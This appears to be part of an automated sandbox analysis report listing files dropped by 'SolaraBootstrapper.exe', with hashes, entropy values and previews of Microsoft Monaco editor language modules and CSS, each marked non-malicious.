                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/shell/shell", ["require","require"],(require)=>{.var moduleExports=(()=>{var a=Object.defineProperty;var s=Object.getOwnPropertyDescriptor;var n=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(r,e)=>{for(var i in e)a(r,i,{get:e[i],enumerable:!0})},d=(r,e,i,o)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of n(e))!l.call(r,t)&&t!==i&&a(r,t,{get:()=>e[t],enumerable:!(o=s(e,t))||o.enumerable});return r};var p=r=>d(a({},"__esModule",{value:!0}),r);var g={};c(g,{conf:()=>m,language:()=>u});var m={comments:{lineComment:"#"},brackets:[["
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (18919)
                                                  Category:dropped
                                                  Size (bytes):19428
                                                  Entropy (8bit):4.57468882983275
                                                  Encrypted:false
                                                  SSDEEP:384:Gu0rtIsZRoMteOKV6TXRcJcWlXvEnMemjVjlVuRHBziYs:6rtI9OA6TKJccXcnMemZ+HF8
                                                  MD5:0C41AA0358C5B909F40BC42D4C537714
                                                  SHA1:CD8E790DD0EB47B3F8E880245E8581E7ED10F697
                                                  SHA-256:950AF3DFF2530D4FA5D9DAF02A0433B61B0CA72A90ABDAD76A4774CB6563292C
                                                  SHA-512:E3730FD49FAFDD5F0BAC4292A86F0DC055E0D5DAD42EAACDB9258BC39EA25167105982C64F6692EAB191AF9D38CF0C11EB1D968D864AAB7B41ADB1445B21032F
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/solidity/solidity", ["require","require"],(require)=>{.var moduleExports=(()=>{var f=Object.defineProperty;var t=Object.getOwnPropertyDescriptor;var n=Object.getOwnPropertyNames;var s=Object.prototype.hasOwnProperty;var o=(e,x)=>{for(var d in x)f(e,d,{get:x[d],enumerable:!0})},r=(e,x,d,u)=>{if(x&&typeof x=="object"||typeof x=="function")for(let i of n(x))!s.call(e,i)&&i!==d&&f(e,i,{get:()=>x[i],enumerable:!(u=t(x,i))||u.enumerable});return e};var a=e=>r(f({},"__esModule",{value:!0}),e);var l={};o(l,{conf:()=>c,language:()=>m});var c={comments:{lineComment:"//",blockC
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3086)
                                                  Category:dropped
                                                  Size (bytes):3591
                                                  Entropy (8bit):5.3438024249343306
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsS6+/ERMr2q+q+q15Th5L2ghb6YT75wGcmvRBNa:G9Yr5rtlfL2gtViYo
                                                  MD5:29F304873002E75868CA6B8076F3639B
                                                  SHA1:E903954C054E76B549868A9D7261BE5FF014F3A5
                                                  SHA-256:3A090D3736D241BB706EC8011AA31D0CF3EF13715813EB8F1100B4738B63B025
                                                  SHA-512:51E6F5704B8CE4C802565123229A6121F27C44994905C52338F9AC92537DA2263D5E272710B59F69081016123B3E719E78D743EA168AC7D607B3FB552610C342
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/sophia/sophia", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var l=(t,e)=>{for(var o in e)s(t,o,{get:e[o],enumerable:!0})},m=(t,e,o,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of a(e))!c.call(t,n)&&n!==o&&s(t,n,{get:()=>e[n],enumerable:!(r=i(e,n))||r.enumerable});return t};var d=t=>m(s({},"__esModule",{value:!0}),t);var u={};l(u,{conf:()=>f,language:()=>g});var f={comments:{lineComment:"//",blockComme
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2874)
                                                  Category:dropped
                                                  Size (bytes):3379
                                                  Entropy (8bit):5.255518653791173
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsKpK+/EG8nKVV1NwqVKzuoZFaXGTCj8K59eaQyfs0P4:G9YdcWCq8zuoZFaXGT888EaQysR
                                                  MD5:5FD9C51E12EAA52A2CD55FCE4BF3243F
                                                  SHA1:D79365147E89C1C9FA043A0151AB231188B06637
                                                  SHA-256:C22B0378FAA2004AC710CE64149D231A9ED8C488B2BF84C222B19A4584C4E442
                                                  SHA-512:29CC25057FB333281F3C4B4A2A509FEC3FF7E8A1F5F559E5F670C338FB5BC4622CA13D3FA13FCCAF8BBCC38262BD5FC2437540EB30E3CA81082CDE9CFA3D37E5
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/sparql/sparql", ["require","require"],(require)=>{.var moduleExports=(()=>{var o=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var d=(s,e)=>{for(var n in e)o(s,n,{get:e[n],enumerable:!0})},c=(s,e,n,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of a(e))!l.call(s,t)&&t!==n&&o(s,t,{get:()=>e[t],enumerable:!(r=i(e,t))||r.enumerable});return s};var g=s=>c(o({},"__esModule",{value:!0}),s);var m={};d(m,{conf:()=>u,language:()=>p});var u={comments:{lineComment:"#"},brackets:[
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (10619)
                                                  Category:dropped
                                                  Size (bytes):11118
                                                  Entropy (8bit):5.246135077425783
                                                  Encrypted:false
                                                  SSDEEP:192:G9YGEhBLxBmmO/C2WP+PeBFqKdtpxDByKMwaSlp8GGN7+HfYWvRfh+kpJAxj9PjW:GuLxB8/CRPhIN7+HLJfh+kQ9b3m
                                                  MD5:A08684AA0EB095C6AEB92A42FFEC4B34
                                                  SHA1:44968F7B443254F4F59634A452CA44F78D49FA3D
                                                  SHA-256:6FF415ADFB27A1FBB87CFA40F0DA164E9314DD1DFED87A3DE39BF2C98E5DED1F
                                                  SHA-512:A98D5BEAEFF6CFAF306CCE4152DF733B65CCE66D5F8E452A1322EBFC7897FCD07C82349A5F3F1FA577A0C76DDC755822DDC79BC9398BB6136236F02AF02F0EDF
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/sql/sql", ["require","require"],(require)=>{.var moduleExports=(()=>{var I=Object.defineProperty;var S=Object.getOwnPropertyDescriptor;var O=Object.getOwnPropertyNames;var C=Object.prototype.hasOwnProperty;var L=(T,E)=>{for(var A in E)I(T,A,{get:E[A],enumerable:!0})},e=(T,E,A,N)=>{if(E&&typeof E=="object"||typeof E=="function")for(let R of O(E))!C.call(T,R)&&R!==A&&I(T,R,{get:()=>E[R],enumerable:!(N=S(E,R))||N.enumerable});return T};var P=T=>e(I({},"__esModule",{value:!0}),T);var M={};L(M,{conf:()=>D,language:()=>U});var D={comments:{lineComment:"--",blockComment:["/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (7725)
                                                  Category:dropped
                                                  Size (bytes):8222
                                                  Entropy (8bit):5.088265541768438
                                                  Encrypted:false
                                                  SSDEEP:192:G9YXarEolwJJi1VJJhjO7Wmr5CV7Q7aIj:GTr9lww1bfjO7Ws5CV7pIj
                                                  MD5:1493A7F80016267D49CAB198B49A188F
                                                  SHA1:0893FC15EC983797FD3BC4A200D7C57B252DF080
                                                  SHA-256:2A053BCBA1A7D58D2806F9206D643B2CDA43BEC4F0E7D50AE940A6F4322EA162
                                                  SHA-512:FCC259023DB995A8727CCDEA1FCD63066763EF4B514F12A6DE07B2A8ADABF36597BD40AA758715BFF94545430EFE07C13DB78263B0D763920694A6917B28C942
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/st/st", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var s=Object.getOwnPropertyDescriptor;var c=Object.getOwnPropertyNames;var i=Object.prototype.hasOwnProperty;var d=(n,e)=>{for(var t in e)r(n,t,{get:e[t],enumerable:!0})},l=(n,e,t,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of c(e))!i.call(n,o)&&o!==t&&r(n,o,{get:()=>e[o],enumerable:!(a=s(e,o))||a.enumerable});return n};var _=n=>l(r({},"__esModule",{value:!0}),n);var m={};d(m,{conf:()=>p,language:()=>u});var p={comments:{lineComment:"//",blockComment:["(*"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (5234)
                                                  Category:dropped
                                                  Size (bytes):5997
                                                  Entropy (8bit):5.322492624705086
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsS+/Ey8SrbV1+/mQcV1+/mQ3OtPWeBQUamNgEC5yHSf3w6Bt1D0rtJP:G9Yq8SrT1x13ttr4Dr2JP
                                                  MD5:E09D279F19A7FAB7B8E071A133A1D243
                                                  SHA1:AD1372EB71C2F6B6615FC2A8C87A9FE046790FA5
                                                  SHA-256:402DAA01303D2866384C42A497AA6A969A4858E4C023C6CED61C9B1E4768312D
                                                  SHA-512:7848D9E9906F646B1C1E370236B05661DE7086755305C0663EC65E6C8D951E3B5EB2F2FA6CDB8B634E5224EB40E67887F86E3066A324FD9A7220752810DE9F87
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/swift/swift", ["require","require"],(require)=>{.var moduleExports=(()=>{var i=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var s=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(o,e)=>{for(var n in e)i(o,n,{get:e[n],enumerable:!0})},u=(o,e,n,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of s(e))!l.call(o,t)&&t!==n&&i(o,t,{get:()=>e[t],enumerable:!(r=a(e,t))||r.enumerable});return o};var d=o=>u(i({},"__esModule",{value:!0}),o);var f={};c(f,{conf:()=>p,language:()=>m});var p={comments:{lineComment:"//",blockComment
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (7925)
                                                  Category:dropped
                                                  Size (bytes):8444
                                                  Entropy (8bit):5.147974796323773
                                                  Encrypted:false
                                                  SSDEEP:192:G9YvrWKO8smwEcmL947wocAejKzaSWKEisQ4b9l/V:GmrdO8s/BmL947wocAISWKEi14b9v
                                                  MD5:2D221CDD143B8693C0282EBE236FFBD3
                                                  SHA1:5B7E79CE6B8FBAB5C0EDB6ADDCAA805BE589F9DC
                                                  SHA-256:BD18A096FECBA5AD476E97E5065EC6EFD013EF7FBA7F9CC2E874A8B67EA0DAF0
                                                  SHA-512:5C9AE644EF0DD28374EB37A6B40905266D53A23FAF03447ED39897BB7C68B74ECD49182EECCD0C9EE72E0DA84985F35F1ACCF815AEDDD3B8EFDB4B5657E2B95C
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/systemverilog/systemverilog", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var s=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var d=(n,e)=>{for(var t in e)r(n,t,{get:e[t],enumerable:!0})},l=(n,e,t,o)=>{if(e&&typeof e=="object"||typeof e=="function")for(let i of a(e))!c.call(n,i)&&i!==t&&r(n,i,{get:()=>e[i],enumerable:!(o=s(e,i))||o.enumerable});return n};var p=n=>l(r({},"__esModule",{value:!0}),n);var f={};d(f,{conf:()=>u,language:()=>m});var u={comments:{lineComment:"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3893)
                                                  Category:dropped
                                                  Size (bytes):4392
                                                  Entropy (8bit):5.207141315230274
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs4+/EoyV1+/0V1+/j7hv4bwceyWPO3lvdIGQc:G9YVxk7BlZ6+Pc
                                                  MD5:6C52F931F23691C21B3725ACC77F4EE7
                                                  SHA1:F30A48BBCB4932BC374DC73B8520BFB620C88E8D
                                                  SHA-256:CDF4F3FD5D755A43D3A7F76D22559140BF49751E063A2CE444B818FD60C869F7
                                                  SHA-512:DECBD06018AF7C29B529203771D6CC7CA23CB7AFC9CE11E4134CAD4A18F26ADEC4D55C34B73F14FABC3795040A9DC47376EA66CAFD43259BABB4926BF78B527E
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/tcl/tcl", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(t,e)=>{for(var o in e)s(t,o,{get:e[o],enumerable:!0})},p=(t,e,o,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of a(e))!l.call(t,n)&&n!==o&&s(t,n,{get:()=>e[n],enumerable:!(i=r(e,n))||i.enumerable});return t};var u=t=>p(s({},"__esModule",{value:!0}),t);var g={};c(g,{conf:()=>k,language:()=>d});var k={brackets:[["{","}"],["[","]"],["(",")"]],au
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (6295)
                                                  Category:dropped
                                                  Size (bytes):6796
                                                  Entropy (8bit):5.3253235674910595
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsyV//YSkzIABXV1+/6mQhX1aJt0lD2Ci2Ihhyc1lkaA7O/N6EHZQg6EJ:G9YJ+SRa+q8J+lD2Ci+5c/7ZQT9kD
                                                  MD5:DCE32076AE8DEFBB172D7E3FCB4B286D
                                                  SHA1:1180278EC6454B62762A2349A607B26FB9A4CF28
                                                  SHA-256:49989D7C64D2272AB54BD0D7C5008083CB0A4B1BC9285E672893293B2614B14E
                                                  SHA-512:50358FC6B0A0E4B877E484820F4B7A762AF0C85621275D2393DE44718ABB46490854934A2B77C4B3DA4A8E87F48BCF6A20A3B59FFA4F6630DD093B0DCD006304
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/twig/twig", ["require","require"],(require)=>{.var moduleExports=(()=>{var m=Object.defineProperty;var l=Object.getOwnPropertyDescriptor;var n=Object.getOwnPropertyNames;var a=Object.prototype.hasOwnProperty;var s=(e,t)=>{for(var r in t)m(e,r,{get:t[r],enumerable:!0})},d=(e,t,r,o)=>{if(t&&typeof t=="object"||typeof t=="function")for(let i of n(t))!a.call(e,i)&&i!==r&&m(e,i,{get:()=>t[i],enumerable:!(o=l(t,i))||o.enumerable});return e};var p=e=>d(m({},"__esModule",{value:!0}),e);var g={};s(g,{conf:()=>h,language:()=>c});var h={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\@\$
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (5987)
                                                  Category:dropped
                                                  Size (bytes):6500
                                                  Entropy (8bit):5.376551819278677
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsMV//UaNhuanx+rzmcZmXYYg1V1+KgqIqynytBGMBb6IoxxwpcaxuSWS:G9YJBhuq+rS70K0SdFSWl4Z
                                                  MD5:B982EDEF10BB0BAE8DF25B06447BE228
                                                  SHA1:86F1D6F0C460D3E27DD4C2600E20103680068889
                                                  SHA-256:3D69304A326C73EE980632AA45ABD086EE1A6509BDF0F689A38B8F433ADCEF32
                                                  SHA-512:BA3F4B6BD671FFA75C829C32D943FCB41CBED3F0F61582E977F4E5AA11BDA60F4CB85C0CE1BCA921AB7B898571073EF63F8FB356D0678C844770A4F6DCE28789
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/typescript/typescript", ["require","require"],(require)=>{.var moduleExports=(()=>{var l=Object.create;var s=Object.defineProperty;var m=Object.getOwnPropertyDescriptor;var x=Object.getOwnPropertyNames;var b=Object.getPrototypeOf,u=Object.prototype.hasOwnProperty;var f=(e=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(e,{get:(t,n)=>(typeof require!="undefined"?require:t)[n]}):e)(function(e){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+e+'" is not supported')});var k=(e,t)=>()=>(t|
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (6113)
                                                  Category:dropped
                                                  Size (bytes):6610
                                                  Entropy (8bit):5.1777692177638786
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsbt+/EBY7SVNv2q+q17qcqv5FX5BmzpMCgkxIcKYWKkVe9NuHPe7Uiv8:G9YAM7m1W5FJOZxWYlkVeSewh
                                                  MD5:1737FFE56ED46E9DE325B390791A1927
                                                  SHA1:44C0283ED590DC935C94AC13E11E5A3BE36399A9
                                                  SHA-256:36BD2530715B7D696F719207915A70534051B82EFF1F3888091759BF5E6D309D
                                                  SHA-512:5FEBCB639063F58F06C0B51C2AEADB683AF25A8219BBBCB42DBBB151F8A9BD041269434D591297BD204C415023A6DF8406232E2C0281456B921D676C28DCCF46
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/vb/vb", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var d=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var i=(n,e)=>{for(var t in e)r(n,t,{get:e[t],enumerable:!0})},c=(n,e,t,s)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of d(e))!l.call(n,o)&&o!==t&&r(n,o,{get:()=>e[o],enumerable:!(s=a(e,o))||s.enumerable});return n};var u=n=>c(r({},"__esModule",{value:!0}),n);var k={};i(k,{conf:()=>g,language:()=>p});var g={comments:{lineComment:"'",blockComment:["/*",
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:C source, ASCII text, with very long lines (1762)
                                                  Category:dropped
                                                  Size (bytes):8146
                                                  Entropy (8bit):5.246964906382546
                                                  Encrypted:false
                                                  SSDEEP:192:G9Y/rTF+NFl2Mc4eMRDRYw/FzvKkb7UXwIez9+j:G+rTF+loU//FzvDGwIez9+j
                                                  MD5:3266BE48A7BFD47578847E67C04B7148
                                                  SHA1:85BCEC32919F18F275A6BC83141169D8C9F5623D
                                                  SHA-256:175FDFC24F48C096A03509F731BA387F30F9E40EF5B783F7383C88F6CFD961B1
                                                  SHA-512:AF40F1C526090C5CB7A090F197E7B80B5FA21CA75B3677D706C90807DCB616C75DCF1E540F1CF8E31B9854D1D74DC09057F2F2DDF8EA346F2A956E09F38B8BAA
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/wgsl/wgsl", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var m=Object.getOwnPropertyDescriptor;var l=Object.getOwnPropertyNames;var u=Object.prototype.hasOwnProperty;var p=(t,e)=>{for(var a in e)s(t,a,{get:e[a],enumerable:!0})},d=(t,e,a,o)=>{if(e&&typeof e=="object"||typeof e=="function")for(let i of l(e))!u.call(t,i)&&i!==a&&s(t,i,{get:()=>e[i],enumerable:!(o=m(e,i))||o.enumerable});return t};var x=t=>d(s({},"__esModule",{value:!0}),t);var F={};p(F,{conf:()=>f,language:()=>L});var f={comments:{lineComment:"//",blockComment:[
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (2993)
                                                  Category:dropped
                                                  Size (bytes):3492
                                                  Entropy (8bit):5.440005861181836
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsscV//yaAAkJmQEmQkBcBreLo:G9YkWPIE5e1
                                                  MD5:DAC8ECB560936AD932496249398FAB3A
                                                  SHA1:F4CF96F4910C83CB6030167005105DB4C68E79CD
                                                  SHA-256:05C1CA7A4076664A7B1247BBE10680821989D8646EED1912F9D3C5A8CE8BC817
                                                  SHA-512:0EFB46595168C2D04D5E844BE6597045F1A11C41AB3D36D4C28616F3651492F6CCD9BD4D9E80C154EFED20D45D25F0CCAECB58485AFC4487473EC79FFDDBB588
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/xml/xml", ["require","require"],(require)=>{.var moduleExports=(()=>{var u=Object.create;var m=Object.defineProperty;var g=Object.getOwnPropertyDescriptor;var p=Object.getOwnPropertyNames;var k=Object.getPrototypeOf,x=Object.prototype.hasOwnProperty;var f=(e=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(e,{get:(t,n)=>(typeof require!="undefined"?require:t)[n]}):e)(function(e){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+e+'" is not supported')});var w=(e,t)=>()=>(t||e((t={exports
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (4595)
                                                  Category:dropped
                                                  Size (bytes):5096
                                                  Entropy (8bit):5.475323240087475
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs5QYio/r/1v7RmV1+/0V1+/jkrBU+A/B1390elEZVOQaB9+aB9wd8rCi:G9Ys8IRNix1rOP/BEIIVOJJmqoE
                                                  MD5:46F89D5C397EE1DFDE20917594200B76
                                                  SHA1:582F5A021E97BD19D96AA03FA2ABB1402937D9CC
                                                  SHA-256:040BA1DE2263EB7785C9C810D3C8DD0DA6B119B02C104DA055DC45AB7B20CF72
                                                  SHA-512:A9F22A22903D5D3418B6A757828000603489AC43C7CF1FA1B21AF5AF02E561474A07390C974586FA8D169311D681537D51C25967D113911A93E9A1D16758BD24
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/yaml/yaml", ["require","require"],(require)=>{.var moduleExports=(()=>{var m=Object.create;var l=Object.defineProperty;var b=Object.getOwnPropertyDescriptor;var p=Object.getOwnPropertyNames;var g=Object.getPrototypeOf,f=Object.prototype.hasOwnProperty;var w=(e=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(e,{get:(n,t)=>(typeof require!="undefined"?require:n)[t]}):e)(function(e){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+e+'" is not supported')});var S=(e,n)=>()=>(n||e((n={expor
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (65256)
                                                  Category:dropped
                                                  Size (bytes):115427
                                                  Entropy (8bit):4.944339734080559
                                                  Encrypted:false
                                                  SSDEEP:1536:0cGIS2lRL4PfPuPjPAPGPoNh4wnlMQBmBkCsJsE0akxPZP/PGPCju7:QUq5BmBkCsJsE0akE
                                                  MD5:DEFFA85F9389710F5ED0C1B4BF432459
                                                  SHA1:A3E05DD6FD435E746D21E624A0E00E6149C2B196
                                                  SHA-256:764A3DDE806A7414402E87CE4BF2DA4F5BB6F36910D887D5C8EE985C1BDF92BD
                                                  SHA-512:13DE3B8695763AC2FFC62BB2D31D06153187C41ED30DE2B791D499B4A9A53FF4576457FF2BAAD5131582FD308A5C47BC089DB2EF562025FC80C59C4B6DF389BD
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/.monaco-action-bar{white-space:nowrap;height:100%}.monaco-action-bar .actions-container{display:flex;margin:0 auto;padding:0;height:100%;width:100%;align-items:center}.monaco-action-bar.vertical .actions-container{display:inline-block}.monaco-action-bar .action-item{display:block;align-items:center;justify-content:center;cursor:pointer;position:relative}.monaco-action-bar .action-item.disabled{cursor:default}.monaco-action-bar .action-item .codicon,.monaco-action-bar .action-item .icon{display:block}.monaco-action-bar .action-item .codicon{display:flex;align-items:center;width:16px;height:16px}.monaco-action-bar .action-label{display:flex;font-size:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (65256)
                                                  Category:dropped
                                                  Size (bytes):3469378
                                                  Entropy (8bit):5.415084325521743
                                                  Encrypted:false
                                                  SSDEEP:49152:ryuU6Sd8m7DYdvOeRGIoXbNN6TIClClxsZQEQ66SuJsI5pBCSGp5nzxFn7ygkZ08:4zSQ
                                                  MD5:40C3107D0D6770823D1936A85BFC99A4
                                                  SHA1:5C9C596EAE2CDAEFD6181DFF9A57D710C9507181
                                                  SHA-256:A79692B8EABD24E0662310C8505D91AB8B85F17DB997E4B8F8838980B25BF6DF
                                                  SHA-512:D6AF8797875A572359DD11BEF64DAB4128AF658F3717177AF483621E9815FBBAB6A27093565694A4B80074A99FEB51CE6F2C6079CDA60E2AC7307FBAFB7381D3
                                                  Malicious:false
